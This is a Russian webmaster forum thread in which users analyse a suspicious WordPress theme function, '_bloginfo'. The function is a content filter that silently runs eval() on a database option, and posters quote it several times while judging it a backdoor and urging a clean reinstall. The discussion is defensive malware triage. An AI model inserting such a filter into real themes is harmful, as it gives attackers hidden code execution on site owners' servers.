- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
sdaprel, Вы чего-нибудь в WP понимаете?
sdaprel, Вы чего-нибудь в WP понимаете?
Нет. я в основном с самописами работаю, и с сайтами на Joomla/
Вы посоветовали убрать функцию _bloginfo
Зачем?
Может она используется в шаблоне?
В этой функции также что-то проверяется...
Советы давать нужно по делу...
Удаление кода может отобразиться на других страницах
Chukcha, я сделал бэкап файлика, прежде чем редактировать. Но тем не менее совет sdaprel помог в плане того, что антивирь теперь не видит в файлике ничего плохого. По другим темам тоже попробовал полазить и всё работает (на мой нубский взгляд)), может быть конечно грабли вылезут в другом месте, но тем не мене пока вроде норм.
Chukcha, как бы вы посоветовали отредактировать данный файлик и нужно ли это делать вообще?
Я совет дал, вернее, задал вопрос
Посмотрите в базе это параметр в таблице options.
И только после этого можно сделать вывод о вредоносности кода.
Сам код посчитан за вредоносный - наличие eval.
Chukcha, в свое оправдание скажу что нормальный разработчик никогда не будет писать такой г.код: $co=@eval(get_option('blogoption'))
1. Это использование не безопасной функции eval
2. Это скрытие вывода ошибок этим куском кода помощью @
3. Это вывод результата данного кода вместо контента.
Это очень подозрительно.
Ну а так как я с WP не работал, поэтому и спросил, у создателя темы, не потерялась ли функциональность шаблона.
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
только не говорите что в Joo не маскируют вывод ошибок.
Это вывод результата данного кода вместо контента.
Вместо переменной $content
О степени вреда можно судить только по наличию/отсутвию данных в таблице, а также.. по возможностям записи в эту строку данных.
Было бы неплохо проверить и на insert|update blogoption
'_bloginfo',
Это зараза! (гугли, если не веришь)
ТС, ну не ужели не понятно - выкинь это гуано. ВСЁ подчистую! (всё равно у тебя пока голый ВП). Почистить хостинг и поставь всё с оф сайта.
АПД.
Малость о заразе.
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
только не говорите что в Joo не маскируют вывод ошибок.
Вместо переменной $content
О степени вреда можно судить только по наличию/отсутвию данных в таблице, а также.. по возможностям записи в эту строку данных.
Было бы неплохо проверить и на insert|update blogoption
если я правильно понял то данной функций добавляется фильтр контента, и название переменной как бы подсказывает, что в ней должен находится содержимое вывода статьи.
Я и не говорил что в Joomla не маскируют вывод ошибок, я говорил про нормальных разработчиков.
и название переменной как бы подсказывает, что в ней должен находится содержимое вывода статьи
Это обманка! Правильная функция - bloginfo. И ты совершенно прав в своих подозрениях:
нормальный разработчик никогда не будет писать такой г.код: $co=@eval(get_option('blogoption'))
1. Это использование не безопасной функции eval
2. Это скрытие вывода ошибок этим куском кода помощью @
3. Это вывод результата данного кода вместо контента.